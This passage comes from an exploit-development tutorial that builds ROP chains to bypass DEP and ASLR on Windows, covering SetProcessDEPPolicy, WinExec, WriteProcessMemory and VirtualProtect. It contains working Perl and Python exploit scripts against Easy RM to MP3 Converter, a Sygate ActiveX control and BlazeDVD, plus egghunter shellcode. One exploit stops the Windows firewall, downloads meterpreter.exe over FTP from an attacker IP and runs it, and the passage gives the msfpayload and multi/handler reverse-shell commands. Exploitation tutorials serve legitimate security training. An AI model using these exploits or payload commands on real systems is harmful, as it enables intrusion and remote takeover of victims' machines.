 Direct RET - ROP Version 3 - SetProcessDEPPolicy()Another way to bypass DEP would be to use a call to SetProcessDEPPolicy(), basically turning off DEPfor the process.This function needs 2 parameters on the stack : a pointer to the shellcode (dynamically generated),and zero.Since we only have a limited number of parameters, I'll try to use a different technique to put theparameters on the stack... PUSHADA pushad instruction will put the registers onto the stack. When the registers are pushed onto thestack, then this is how the top of the stack will look like :EDIESIEBPvalue pointing to stack right after this blockEBXEDXECXEAXThat means that, if we position our nops/shellcode right after this block, then perhaps we can takeadvantage of the fact that we'll have a value on the stack that points to our shellcode "auto
magically".  Next, the pushad will return to the top of the stack (value that can be manipulated using EDI). Sothat provides us with the perfect path to make this work.In order to put the right parameters in the right place, we have to craft the registers with thefollowing values :EDI = pointer to RET (slide to next instruction : rop nop)ESI = pointer to RET (slide to next instruction : rop nop)EBP = pointer to SetProcessDEPPolicy()EBX = pointer to zeroEDX, ECX and EAX don't really matterAfter the pushad, the stack will look like this :RET (taken from EDI)RET (taken from ESI)SetProcessDEPPolicy()   (taken from EBP)Pointer to shellcode (auto magically inserted by pushad)Zero  (taken from EBX)EDX (junk)ECX (junk)EAX (junk)nopsshellcodeThe rop chain to do this might look something like this :my $eip=pack('V',0x100102DC); #return to stackmy $junk2 = "AAAA"; #compensate#put zero in EBXmy $rop=pack('V',0x100109EC);  #POP EBX$rop=$rop.pack('V',0xFFFFFFFF);  #<- will be put in EBX$rop=$rop.pack('V',0x1001C1A5); #INC EBX, EBX = 0 now$rop=$rop.pack('V',0x10014F75); #POP EBP$rop=$rop.pack('V',0x7C8622A4);  #<- SetProcessDEPPolicy, into EBP#put RET in EDI (needed as NOP)$rop=$rop.pack('V',0x1001C07F); #POP EDI (pointer to RET)$rop=$rop.pack('V',0x1001C080); #RET#put RET in ESI as well (NOP again)$rop=$rop.pack('V',0x10010C31); #POP ESI$rop=$rop.pack('V',0x1001C080); #RET$rop=$rop.pack('V',0x100184FA);  #PUSHAD#ESP will now automagically point at nops(Just append nops + shellcode to this rop chain and you're all set)Result :
 Direct RET - ROP Version 4 - ret-to-libc : WinExec()So far, I have explained a few ways to bypass DEP, using specific Windows functions. In every case,the real challenge behind the technique is to find reliable ROP gadgets that will craft your stack andcall the function.I think it's important to note that a "classic" ret-to-libc - style method (using WinExec() forexample) might still be a valuable technique as well.While putting together the stack to make a successful call to WinExec() will require some ROP, it isstill different from the other DEP bypass techniques, because we are not going to execute customshellcode. So we don't really need to change execution flags or disable DEP. We just are going tocall a windows function and use a pointer to a series of OS commands as a parameter.http://msdn.microsoft.com/en-us/library/ms687393(VS.85).aspxUINT WINAPI WinExec(  __in  LPCSTR lpCmdLine,  __in  UINT uCmdShow);First argument is a pointer to the command to execute, and the second parameter indicates thewindow behavior. Some examples :0 = Hide window1 = Show normal10 = Show default11 = Force minimizeIn order to make this one work, you will need to add a return address to the parameters (firstparameter to be precise). This can just be any address, but there has to be something in that field.So, this is what the stack should look likereturn addresspointer to the command0x00000000 (HIDE)On XP SP3, WinExec is located at 0x7C86250DTake a look at this example :#ROP based exploit for Easy RM to MP3 Converter#Uses WinExec()#written by corelanc0d3r - http://www.corelan.be:8800my $file= "rop.m3u";
my $buffersize = 26094;my $junk = "A" x $buffersize;my $eip=pack('V',0x100102DC); #return to stackmy $junk2 = "AAAA"; #compensate#-----------------------------------------------##WinExec 7C86250D#-----------------------------------------------#my $evilIP="192.168.0.189";my $rop=pack('V',0x100109EC); #POP EBX$rop=$rop.pack('V',0xFFFFFFFF);  #<- will be put in EBX$rop=$rop.pack('V',0x1001C1A5); #INC EBX, EBX = 0 = HIDE$rop=$rop.pack('V',0x10014F75);  #POP EBP$rop=$rop.pack('V',0xFFFFFFFF); #return address for WinExec$rop=$rop.pack('V',0x10010C31); #POP ESI$rop=$rop.pack('V',0x7C86250D); #WinExec()$rop=$rop.pack('V',0x1001C07F); #POP EDI$rop=$rop.pack('V',0x1001C080); #RET, put in EDI (NOP)$rop=$rop.pack('V',0x1002CC86); #pushad + retmy $cmd='cmd /c "net stop SharedAccess && ';$cmd=$cmd."echo user anonymous > ftp.txt && ";$cmd=$cmd."echo anonymous@bla.com >> ftp.txt && ";$cmd=$cmd."echo bin >> ftp.txt && ";$cmd=$cmd."echo get meterpreter.exe >> ftp.txt ";$cmd=$cmd."&& echo quit >> ftp.txt && ";$cmd=$cmd."ftp -n -s:ftp.txt ".$evilIP." && ";$cmd=$cmd.'meterpreter.exe"'."\n";#it's ok to put a null byte, EIP is already overwrittenmy $payload = $junk.$eip.$junk2.$rop.$cmd;print "Payload size : ".length($payload)."\n";open($FILE,">$file");print $FILE $payload;close($FILE);print "m3u File $file Created successfully\n";First, 0x00000000 is placed into EBX (POP 0xFFFFFFFF into ebx, and then INC EBX is called),  thenthe registers are set up to do a PUSHAD call (basically I put the return address in EBP, the WinExec()pointer into ESI, and a RET (NOP) into EDI).The command above will only work if the firewall service on the XP machine is stopped.  If the PC isnot running windows firewall, you may have to remove the "net stop SharedAccess" piece.$evilIP is your attacker machine, running an ftp server which contains meterpreter.exe, createdusing the following metasploit command :./msfpayload windows/meterpreter/reverse_tcp RHOST=192.168.0.189 RPORT=4444    LHOST=192.168.0.189 LPORT=4444 X > meterpreter.exe(put everything on one line and copy the file to the FTP server root)On the attacker machine, set up a metasploit multihandler listener :./msfcli multi/handler payload=windows/meterpreter/reverse_tcp      lhost=192.168.0.189 lport=4444 EResult :
 As you can see, even a simple pointer to WinExec will allow you to bypass DEP (works for all cases !)and get you a meterpreter shell.   SEH Based - The ROP version - WriteProcessMemory()In order to demonstrate how SEH based exploits can be turned into a ROP version, I will use anrecently published vulnerability, discovered by Lincoln, targeting an ActiveX buffer overflow inSygate Personal Firewall 5.6.  As we can see in the advisory, the SetRegString() function insshelper.dll is susceptible to a buffer overflow, which is overwriting the exception handler.You can get a copy of the exploit here : http://www.exploit-db.com/exploits/13834This function takes 5 arguments.  The 3rd argument is the one that will take you to the bufferoverflow :<object classid='clsid:D59EBAD7-AF87-4A5C-8459-D3F6B918E7C9' id='target' ></object><script language='vbscript'>arg1=1arg2=1arg3=String(28000,"A")arg4="defaultV"arg5="defaultV"target.SetRegString arg1 ,arg2 ,arg3 ,arg4 ,arg5</script>On IE6 and IE7, the SEH record is overwritten after 3348 bytes. (so 3348 bytes to nseh, and 3352bytes to seh)In a typical (non-ROP) exploit, we would probably end up overwriting nseh with a short jumpforward (\xeb\x06\x90\x90) and seh with a pointer to pop/pop/ret.  As explained earlier, thisapproach is not going to work when DEP is enabled, because we cannot execute code beforeactually disabling/bypassing DEP first.However, there is an easy way to overcome this issue. We just need to pivot back to the stack whenthe exception handler (the one that we have overwritten) kicks in.So basically, we don't really care about nseh (4 bytes), so we'll create a little script that willoverwrite SE Handler after 3352 bytes.What we are interested in, is seeing how far our buffer (on the stack) is away when the SE Handlergets called. So we will overwrite SE Handler with a valid pointer to an instruction. At this type, just
to see where our buffer is, any instruction will do, because we only want to see how far our buffer isaway when we jump to that instruction.Triggering the bugWe'll put a pointer to RET into SE Handler (we'll just take one from sshelper.dll for now :0x0644110C), and then add 25000 more bytes (to trigger the access violation).  Our test exploitscript so far will look something like this :<html><object classid='clsid:D59EBAD7-AF87-4A5C-8459-D3F6B918E7C9' id='target' ></object><script language='vbscript'>junk  = String(3352, "A")seh = unescape("%0C%11%44%06")junk2 = String(25000, "C")arg1=1arg2=1arg3= junk + seh + junk2arg4="defaultV"arg5="defaultV"target.SetRegString arg1 ,arg2 ,arg3 ,arg4 ,arg5</script></html>Save the html file to your c: drive and open it in Internet Explorer. Attach Immunity Debugger toiexplore.exe.  Allow the activeX object to run (you may have to click OK twice) and let Immunitycatch the exception.When you observe the SEH chain, you should that we have overwritten the SE Handler with ourpointer to RET :
If you get the SEH chain view like the screenshot above (2 SEH records), press Shift F9 just once.Then you should see the same register / stack view when you would only have seen one SEH record:
Scroll down in the stack view until you see your overwritten SE Handler :
Set a breakpoint on 0x0644110C and pass the exception to the application (Press Shift F9). Theregisters now contain this :
and the top of the stack looks like this :
Scroll down until you see the first part of your buffer (A's) :
Stack pivotingSo, we find our buffer back at ESP (01A6E34C + 1032 bytes).  That means that, if we want to returnfrom the SE Handler to our buffer, we have to pivot the stack with at least 1032 bytes (0x408 ormore).  My good friend Lincoln generated his rop file and found a pointer to ADD ESP,46C + RET insshelper.dll at 0x06471613
That means that, if we overwrite our SE Handler with a pointer to ADD ESP,46C + RET, then thatshould make us land back in our controlled buffer and start our rop chain.Modify the script and replace the "seh = ..."  line withseh = unescape("%13%16%47%06")Open the file in Internet Explorer again (Immunity debugger attached to it), and let the activeXobject run.  When the crash occurs, observe the SEH chain and verify that it is overwritten with thecorrect pointerSet a breakpoint to 0x06471613. Pass the exception to the application (twice if needed,) until thebreakpoint is hit.
At this point, ESP points to 01A5E330Then use F7 to step through the instructions. When the "ADD ESP,46C" instruction is executed,
check ESP (and the contents at the top of the stack) :
Awesome, that means that we have been able to pivot the stack and land back in a location wherewe can initiate the rop chain.From that point forward, this exploit can be built just like any other rop based exploit :Set your strategy (WriteProcessMemory() in this case, but you can obviously use anothertechnique as well),Get your rop gadgets (!pvefindaddr rop),and build the chainBut first of all, you will need to figure out where exactly in the A's we will land, so we can start therop chain in the right place.You will notice that, when you try to locate the offset (IE6, IE7), that the offset may change. It mayvary somewhere between 72 bytes and 100 bytes (100 bytes max)That means that we are not 100% sure where we will land in the buffer. How can we survive that ?  We know the concept of nop's, to allow trampolines to be a little bit "off"when jumping to shellcode.  But is there such a thing as a rop-compatible nop ? ROP NOPOf course there is. Remember "direct RET sploit version 3" ? We already used a slide to walk to thenext address on the stack.In order to be able to make the exploit generic (without having to create multiple rop chains insidea single exploit), you can simply "spray" some regions of the stack with ROP NOPs, basicallyrepresented by pointers to RET. Every time the RET is called, it will slide /jump to the next retwithout really doing anything bad.So that's kinda like a nop.A pointer is made up of 4 bytes, so it will be important to align these pointers, makingsure that, when EIP returns to the stack, it would land & execute the instructions at thepointer (and would not land in the middle of a pointer, breaking the chain), or wouldland directly at the first gadget of your rop chain.Finding rop nops is not that hard. Any pointer to RET will do. Back to our exploit 
Building the ROP chain - WriteProcessMemory()Crafting the stack for a given function can be done in many ways. I will simply explain how Lincolnbuilt his rop chain and turned the bug into a working DEP bypassing exploit.Important note : we have to deal with bad characters : bytes between 80 and 9f must beavoided.In his exploit, Lincoln decided to use PUSHAD to put the parameters on the stack, in the right place,and then make the call to the function (WriteProcessMemory() in this case).First of all, to make sure the rop chain gets launched, even if the location where we land after theADD ESP,46C instruction is different, he used a number of RET pointers (0x06471619) as nop's :
Then he puts 0x064BC001 into ebp (using a pop ebp + ret gadget at 0x0644B633), and uses achain of pop instructions (at 0x0647B965) to load 5 "parameters" into registers :
 
After these 5 POP's got executed, the registers look like this :
Next, he will generate the shellcode length. He used 3 ADD EAX,80 instructions and then adds the
sub to the current value in EBX :
Result :
So the shellcode length is now placed in ebx.Next, he will try to put theThe rop gadgets that were used to accomplish this, are POP EAX (take 0xCCD0731F from thestack), and then do SUB EAX,ECX.  Finally, this value is put in EBP.
 Note : the reason why Lincoln couldn't just pop 7C9022CF into EBP is because thatparticular address contains a "bad char" - we cannot use byte 0x80. ECX alreadycontains 50505050, so he used a sub instruction (with a pre-calculated value in eax) toreproduce that pointer. Smart thinking !
This rop subchain has put 7C9022CF into EBP. This address will be the target location to write ourshellcode to. In essence, we will be patching the WriteProcessMemory() function itself, so thisaddress should sound familiar if you read the section about WriteProcessMemory() carefully.
The last gadget does not really end with a RET. Instead, it will do a call ESI.Where does ESI come from ?  Remember the 5 POP's we did earlier? Well, we simply put a value onthe stack that got popped into ESI. And that value is a pointer to the following instructions :
So the CALL ESI will jump to that location, increase ESP with 4 bytes, put a value (06454ED5) intoEAX and then return. We simply return to the stack, where our next rop gadget is placed :
Using this gadget, ESI is set to FFFFFFFF. This will be the value used as hProcess parameter later onNext, CCD07263 is popped into eax, and after that, a SUB EAX,ECX instruction is executed. 
After executing those instructions, the result in EAX will be 7C802213 (which is the pointer tokernel32.WriteProcessMemory)
Finally, a PUSHAD instruction is executed :
This will make the top of the stack look like this :

When the pushad function returns, it will execute the instructions at 0x0647BD7C (which originatefrom EDI, placed into this register using the 5 POP's earlier)This instruction will simply do a CALL EAX.  In EAX, we still have a pointer tokernel32.WriteProcessMemory().  When the CALL EAX is made, the following parameters are takingfrom the stack :
The first parameter does not really matter. The code will patch WPM(), so it will never return.  Then,the hProcess parameter (FFFFFFFF) and Address (destination, where to write the shellcode to) can befound, followed by the Buffer (location of the shellcode. This pointer was taken from ESP. SincePUSHAD also shifted ESP (and since we have placed our shellcode directly after the rop chain), thispointer now points to the shellcode.The BytesToWrite value was generated earlier.  Finally, the last parameter just points to a writeablelocation.First, dump the contents at 0x78022CF :
Press F7 to step through. After the call to ntdll.ZwWriteVirtualMemory is made (at 7C8022C9),before the RETN 14 instruction is executed at the end of that call, we see that our shellcode wascopied to 7C8022CF :
When the RETN 14 instruction is executed, we land nicely at 7C8022CF, which just is the nextinstruction in the natural flow of WriteProcessMemory().Since this location now contains shellcode, the shellcode will get executed.
Result :
Conclusion : in this ROP exploit, a different technique was used to put the parameters on the stack.The parameters were first generated (using ADD and SUB instructions) and popped into registers.Finally, a PUSHAD instruction puts the instructions in the right place, and the call to the API is made. Egghunters
In tutorial 8, I have discussed the internals of egghunters. Summarizing the concept of an egghunter, you will need to be able to execute a small amount of code, which will look for the realshellcode (on the stack or in the heap) and execute it.You should already know how to get an egg hunter to run, using rop.  An egghunter is just some"small" shellcode, so you should just apply a rop sequence to make the egg hunter run.When the egg hunter has found the shellcode, it will jump to the base address of the shellcode.  Ofcourse, when DEP is enabled, this will most likely not work.That means that we need to insert a second rop chain, to make sure we can mark the shellcode asexecutable.There are 2 ways to do this :append a rop routine to the egg hunter itselfprepend the final shellcode with a rop routineLet's take a look at how these 2 scenario's should be implemented, using a commonly used egghunter (using NtAccessCheckAndAuditAlarm) :681CAFF0F   or dx,0x0fff42          inc edx52          push edx6A02        push byte +0x258          pop eaxCD2E        int 0x2e3C05        cmp al,0x55A          pop edx74EF        je xxxxB877303074  mov eax,0x743030778BFA        mov edi,edxAF          scasd75EA        jnz xxxxxxAF          scasd75E7        jnz xxxxxFFE7        jmp edi         Again, I assume you already know how to get this egg hunter to run using rop.As you can see, at the end of this egg hunter (when the shellcode was found), the address of theshellcode will be stored in edi.  The last instruction of the egg hunter will jump to edi and attemptto execute the shellcode.  When DEP is enabled, the jump will be made, but the execution of theshellcode will fail.How can we fix this ?Scenario 1 : patch the egg hunterIn this first scenario, I will modify the egg hunter to make sure that the location where the shellcodeis located, gets marked as executable first.The "jmp edi" instruction (which will make the jump) needs to be removed.Next, we have to mark the memory where the shellcode is, as executable. We can do this by callingVirtualProtect().  Luckily, we don't have to use ROP this time, we can simply write the code in asmand append it to the egg hunter. It will get executed just fine (because the current location isalready executable)The additional code that needs to be written, needs to craft the following values on the stack :
return address : this is the address in edi - pointing to the shellcode. This will make sure theshellcode will get executed automatically after the call to VirtualProtect() returnslpAddress : same address as "return address"size : shellcode sizeflNewProtect : set to 0x40lpflOldProtect : pointer to a writable locationFinally it needs to call the VirtualProtect() function (making sure the first parameter is at the top ofthe stack), and that's it :sample asm code :[bits 32]push 0x10035005    ;param5 : writable address;0x40xor eax,eaxadd al,0x40push eax           ;param4 : flNewProtect;shellcode length - use 0x300 in this exampleadd eax,0x7FFFFFBFsub eax,0x7FFFFCFFpush eax         ;param3 : size : 0x300 bytes in this casepush edi           ;param2 : lpAddresspush edi           ;param1 : return addresspush 0x7C801AD4    ;VirtualProtectretor, in opcode :"\x68\x05\x50\x03\x10\x31\xc0\x04"."\x40\x50\x05\xbf\xff\xff\x7f\x2d"."\xff\xfc\xff\x7f\x50\x57\x57\x68"."\xd4\x1a\x80\x7c\xc3";So, basically, the entire egg hunter would look like this :#-------------------------------------------------------------------#corelanc0d3r - egg hunter which will mark shellcode loc executable#size to mark as executable : 300 bytes#writeable location : 10035005#XP SP3#-------------------------------------------------------------------my $egghunter ="\x66\x81\xCA\xFF\x0F\x42\x52\x6A\x02"."\x58\xCD\x2E\x3C\x05\x5A\x74\xEF\xB8"."\x77\x30\x30\x74". # w00t"\x8B\xFA\xAF\x75\xEA\xAF\x75\xE7\xFF". #no more jmp edi at the end#VirtualProtect"\x68\x05\x50\x03\x10\x31\xc0\x04"."\x40\x50\x05\xbf\xff\xff\x7f\x2d"."\xff\xfc\xff\x7f\x50\x57\x57\x68"."\xd4\x1a\x80\x7c\xc3";This is a small, but not really a generic egg hunter.So perhaps I can make it more portable (and bigger unfortunately).  If size is not really important,then this might be a generic way to make it work :(just edit the "shellcode_size" and "writeable_address" variables in the asm code to match yourspecific exploit, and you should be ready to use it)
;----------------------------------------;quick and dirty asm;to locate VirtualProtect;use it to make shellcode at edi;executable, and jump to it;;Peter Van Eeckhoutte 'corelanc0d3r;http://www.corelan.be:8800;----------------------------------------;modify these values;to match your environmentshellcode_size equ 0x100writeable_address equ 0x10035005hash_virtualprotect equ 0x7946C61B;;[BITS 32]global _start_start:FLDPIFSTENV [ESP-0xC]pop eaxpush edi  ;save shellcode locationpush eax  ;current locationxor edx,edxmov dl,0x7D   ;offset to start_main;skylined technique  XOR     ECX, ECX             ; ECX = 0  MOV     ESI, [FS:ECX + 0x30] ; ESI = &(PEB) ([FS:0x30])  MOV     ESI, [ESI + 0x0C]    ; ESI = PEB->Ldr  MOV     ESI, [ESI + 0x1C]    ; ESI = PEB->Ldr.InInitOrdernext_module:  MOV     EAX, [ESI + 0x08]    ; EBP = InInitOrder[X].base_address  MOV     EDI, [ESI + 0x20]    ; EBP = InInitOrder[X].module_name (unicode)  MOV     ESI, [ESI]           ; ESI = InInitOrder[X].flink (next module)  CMP     [EDI + 12*2], CL     ; modulename[12] == 0 ?  JNE     next_module          ; No: try next module.;jmp start_main     ; replace this with relative jump forwardpop ecxadd ecx,edxjmp ecx            ;jmp start_main ;=======Function : Find function base address============find_function:pushad                           ;save all registersmov ebp,  [esp  +  0x24]         ;put base address of module that is being                                 ;loaded in ebpmov eax,  [ebp  +  0x3c]         ;skip over MSDOS headermov edx,  [ebp  +  eax  +  0x78] ;go to export table and put relative address                                 ;in edxadd edx,  ebp                    ;add base address to it.                                 ;edx = absolute address of export tablemov ecx,  [edx  +  0x18]         ;set up counter ECX                                 ;(how many exported items are in array ?)mov ebx,  [edx  +  0x20]         ;put names table relative offset in ebxadd ebx,  ebp                    ;add base address to it.                                 ;ebx = absolute address of names tablefind_function_loop:jecxz  find_function_finished    ;if ecx=0, then last symbol has been checked.
                                 ;(should never happen)                                 ;unless function could not be founddec ecx                          ;ecx=ecx-1mov esi,  [ebx  +  ecx  *  4]    ;get relative offset of the name associated                                 ;with the current symbol                                 ;and store offset in esiadd esi,  ebp                    ;add base address.                                 ;esi = absolute address of current symbolcompute_hash:xor edi,  edi                    ;zero out edixor eax,  eax                    ;zero out eaxcld                              ;clear direction flag.                                 ;will make sure that it increments instead of                                 ;decrements when using lods*compute_hash_again:lodsb                            ;load bytes at esi (current symbol name)                                 ;into al, + increment esitest al,  al                      ;bitwise test :                                 ;see if end of string has been reachedjz  compute_hash_finished        ;if zero flag is set = end of string reachedror edi,  0xd                    ;if zero flag is not set, rotate current                                 ;value of hash 13 bits to the rightadd edi,  eax                    ;add current character of symbol name                                 ;to hash accumulatorjmp compute_hash_again           ;continue loopcompute_hash_finished:find_function_compare:cmp edi,  [esp  +  0x28]         ;see if computed hash matches requested hash                                 ; (at esp+0x28)                                 ;edi = current computed hash                                 ;esi = current function name (string)jnz find_function_loop           ;no match, go to next symbolmov ebx,  [edx  +  0x24]         ;if match : extract ordinals table                                 ;relative offset and put in ebxadd ebx,  ebp                    ;add base address.                                 ;ebx = absolute address of ordinals address tablemov cx,  [ebx  +  2  *  ecx]     ;get current symbol ordinal number (2 bytes)mov ebx,  [edx  +  0x1c]         ;get address table relative and put in ebxadd ebx,  ebp                    ;add base address.                                 ;ebx = absolute address of address tablemov eax,  [ebx  +  4  *  ecx]    ;get relative function offset from its ordinal                                 ;and put in eaxadd eax,  ebp                    ;add base address.                                 ;eax = absolute address of function addressmov [esp  +  0x1c],  eax         ;overwrite stack copy of eax so popad                                 ;will return function address in eaxfind_function_finished:popad                           ;retrieve original registers.                                ;eax will contain function addressret;-----------MAIN-------------start_main:    mov dl,0x04    sub esp,edx      ;allocate space on stack    mov ebp,esp      ;set ebp as frame ptr for relative offset    mov edx,eax      ;save base address of kernel32 in edx    ;find VirtualProtect    push hash_virtualprotect    push edx    call find_function    ;VirtualProtect is in eax now
    ;get shellcode location back    pop edi    pop edi    pop edi    pop edi    push writeable_address    ;param5 : writable address    ;generate 0x40 (para4)    xor ebx,ebx    add bl,0x40    push ebx           ;param4 : flNewProtect    ;shellcode length    add ebx,0x7FFFFFBF  ;to compensate for 40 already in ebx    sub ebx,0x7FFFFFFF-shellcode_size    push ebx         ;param3 : size : 0x300 bytes in this case    push edi         ;param2 : lpAddress    push edi         ;param1 : return address    push eax         ;VirtualProtect    retCombined with the egg hunter itself, the code would look like this :#-------------------------------------------------------------------# corelanc0d3r - egg hunter which will mark shellcode loc executable# and then jumps to it# Works on all OSes (32bit) (dynamic VirtualProtect() lookup# non-optimized - can be made a lot smaller !## Current hardcoded values :#  - shellcode size : 300 bytes#  - writeable address : 0x10035005#-------------------------------------------------------------------my $egghunter ="\x66\x81\xCA\xFF\x0F\x42\x52\x6A\x02"."\x58\xCD\x2E\x3C\x05\x5A\x74\xEF\xB8"."\x77\x30\x30\x74". # w00t"\x8B\xFA\xAF\x75\xEA\xAF\x75\xE7\xFF".#shellcode is now located. pointer is at edi#dynamic call to VirtualProtect & jump to shellcode"\xd9\xeb\x9b\xd9\x74\x24\xf4\x58"."\x57\x50\x31\xd2\xb2\x7d\x31\xc9"."\x64\x8b\x71\x30\x8b\x76\x0c\x8b"."\x76\x1c\x8b\x46\x08\x8b\x7e\x20"."\x8b\x36\x38\x4f\x18\x75\xf3\x59"."\x01\xd1\xff\xe1\x60\x8b\x6c\x24"."\x24\x8b\x45\x3c\x8b\x54\x05\x78"."\x01\xea\x8b\x4a\x18\x8b\x5a\x20"."\x01\xeb\xe3\x37\x49\x8b\x34\x8b"."\x01\xee\x31\xff\x31\xc0\xfc\xac"."\x84\xc0\x74\x0a\xc1\xcf\x0d\x01"."\xc7\xe9\xf1\xff\xff\xff\x3b\x7c"."\x24\x28\x75\xde\x8b\x5a\x24\x01"."\xeb\x66\x8b\x0c\x4b\x8b\x5a\x1c"."\x01\xeb\x8b\x04\x8b\x01\xe8\x89"."\x44\x24\x1c\x61\xc3\xb2\x04\x29"."\xd4\x89\xe5\x89\xc2\x68\x1b\xc6"."\x46\x79\x52\xe8\x9c\xff\xff\xff"."\x5f\x5f\x5f\x5f\x68\x05\x50\x03"."\x10\x31\xdb\x80\xc3\x40\x53\x81"."\xc3\xbf\xff\xff\x7f\x81\xeb\xff"."\xfe\xff\x7f\x53\x57\x57\x50\xc3";200 bytes is a bit large for an egg hunter, but hey, it can be optimized a lot (good exercise for
you). On the other hand, 200 bytes will fit nicely into WPM(), so you have plenty of options to makethis one work. Scenario 2 : prepend the shellcodeIf you don't have enough space to throw in the additional 28 (or about 200 bytes for the genericversion), then you can do this :Take out the "jmp edi" instruction, and replace it with "push edi", "ret"  (x57 xc3)  Then, in the shellcode, between the tag (w00tw00t) and the shellcode itself, you will have tointroduce a rop chain, which should mark the current page as executable and run it.If you understood this tutorial so far, you should know how to implement this.  UnicodeWhat if your buffer appears to be subject to unicode ?  Well, the answer is quite simple : you willneed to find unicode compatible pointers to rop gadgets. "pvefindaddr rop" will indicate if a pointer is unicode compatible... just make sure not to use the"nonull" keyword for the function or you won't see any unicode addresses.  It is clear thought thatunicode will decrease your chances on a successful exploit (because the number of usable pointerswill be limited)In addition to this, you will also need to find unicode pointers to the windows API you are going touse to bypass DEP. Good luck ! ASLR and DEP ?The theoryBypassing DEP and ASLR at the same time will require at least one non-ASLR module to be loaded.(well, that's not entirely true, but in most cases (read: almost all cases), this statement will be valid)If you have a module that is not ASLR enabled, then you can try to build your rop chain based onpointers from that module alone. Of course, if your rop chain uses an OS function to bypass DEP,you will need to have a pointer to such a call in that module as well.Alexey Sintsov demonstrated this technique in his ProSSHD 1.2 exploitAlternatively, you need to find a pointer to the OS module somewhere on the stack, in a register,etc... . If that happens, you can use rop gadgets from the non-aslr module to steal that value anduse an offset to that value to get to the address of the OS function.The bad news is that, if there is not a single module that is not subject to ASLR, then it might beimpossible to build a reliable exploit. (you can still try some bruteforcing etc... or find memoryleaks/pointers on the stack somewhere).  The good news is that "pvefindaddr rop" will automaticallysearch for non-ASLR modules. So if !pvefindaddr rop shows some output, then the addresses will
most likely be reliable.In pvefindaddr v1.34 and up, there is a function called "ropcall", which will search andlist all interesting calls to DEP bypass functions, in the loaded modules. This may behelpful in finding an alternative (and perhaps ASLR bypassing) function call.Example : (on Easy RM to MP3 Converter, module msrmfilter03.dll) :
If you can use instructions from a non-ASLR module, and you have a pointer to an ASLR module (OSdll for example) on the stack (or in memory), then perhaps you can take advantage of that, and usean offset to that pointer to find/use other usable instructions from that ASLR enabled module.  Thebase address of the module might change, but the offset to a certain function should remain thesame.You can find a nice write-up about an exploit which bypasses ASLR and DEP, without using a nonASLR module here.An exampleIn the following example, documented by mr_me, I will show a possible technique to use ropgadgets from a non ASLR compiled module to fetch an OS dll pointer from the stack and use anoffset to that pointer to calculate the address of VirtualProtect.If we can find a pointer on the stack, which points to kernel32.dll, then we can modify the value(add or sub an offset) until we reach the relative address of VirtualProtect().Test environment : Vista Business SP2, English (Virtualbox).For this example we will use a vulnerability in BlazeDVD Professional 5.1, discovered in august2009.  You can download a vulnerable copy of the application here :
  BlazeDVD 5.1 Professional (Log in before downloading this file ! ) - Downloaded 315 timesThe sample code on exploit-db indicates that the SEH record is overwritten after 608 bytes. Wealready know that the 4 bytes at nseh at not important in a rop based sploit, so we'll build apayload that has 612 bytes, and then overwrites se handler with a pointer that would pivot controlback to the stack. You can run "!pvefindaddr noaslr" to list the modules that are not subject to ASLR. You will see thatmost/all application modules are not ASLR enabled. (Of course, the Windows OS modules are ASLRenabled).After having created a rop.txt file (using "!pvefindaddr rop nonull"), and after setting a breakpoint atSEH (so we can calculate the offset to get back to a controlled buffer location the stack), we canconclude that for example "ADD ESP,408 + RET 4" gadget (at 0x616074AE, from EPG.dll) would be agood way to start the chain.  That would make us land in the buffer before the seh chain, which isok.Note : it will be important to avoid putting in large amounts of data on the stack afteroverwriting SEH.  Overwriting the stack may also overwrite/push away the pointer (ifany). All you need is a way to trigger an access violation so the overwritten SEH recordwould kick in and we can gain control over EIP.Exploit code so far looks like this :
#!/usr/bin/pythonjunk = "A" * 612## SEH - pivot the stackrop = '\xae\x74\x60\x61' # 0x616074AE : # ADD ESP,408 # RETN 4sc = "B" * 500buffer = junk + rop + scfile=open('rop.plf','w')file.write(buffer)file.close()The crash/exception is triggered because we have overwritten direct RET (with the "A"'s in the"junk" variable). (Which means that you may be able to build a direct RET variant for this sploit aswell. Anyways, we already decided to use SEH).When we observe the stack when the SE Handler is called, right after the "ADD ESP,408" instructionis executed, we see this :1. We will land in the A's before overwriting SEH. Using a metasploit pattern we discover that weland after 312 A's in that buffer. That means that your first gadget pointer needs to be placed atthat location. If you will be using a lot of pointers (and/or shellcode), you may have to think aboutthe fact that the SEH pointer is placed at byte 612 in your buffer.)
2. Scroll down in the stack view. After the buffer (filled with A's + our SEH handler + B's) you shouldstart to see pointers on the stack, indicating "RETURN to ... from ..." :
These are saved EIP's - placed on the stack by functions that were called earlier.If you scroll almost all the way down, you will find a pointer to an address in kernel32 :
The goal would be to set up a rop chain that would fetch that pointer, and add/sub an offset until itpoints at VirtualProtect.  The pointer we see on the stack, at 0x0012FF8C, is 0x7664D0E9.  In thecurrent process/environment, kernel32.dll is loaded at 0x76600000.
VirtualProtect() is located at 0x76601DC3
That means that the VirtualProtect() function can be found at [kernel32_baseaddress + 0x1DC3] or,at [found_pointer - 0x4B326 bytes]. Remember this offset.Reboot the machine and see if the pointer can still be found at the same location, and that theoffset from the picked up pointer from the stack, to VirtualProtect() is still the same.After the reboot, kernel32.dll is loaded at 0x75590000. The function is (obviously) still atkernel32.baseaddress offset +0x1DC3 :
On the stack, the pointer at 0012FF8C is 755DD0E9.  If we subtract the offset (0x4B326 bytes)again, we end up at 75591DC3. And that's VirtualProtect ! This means that we have found a reliableplace to pick up a kernel32 pointer, and found a reliable offset to get to VirtualProtect().How can we get this value from the stack into a register so we can use it to set up the API call ?Well, a possible method would be :make a register point at the stack address (0x0012FF8C in this case). Let's say youdynamically crafted this value into eax.   (0x6162A59E + 0x61630804, + chain of ADDEAX,xxx )use a gadget which would do something like this :  mov eax,[eax] + ret.   This would take thekernel32 pointer and put it into eax. (variations on this instruction will work too, of course -example : MOV EAX,DWORD PTR DS:[EAX+1C] - like the one at 0x6160103B)
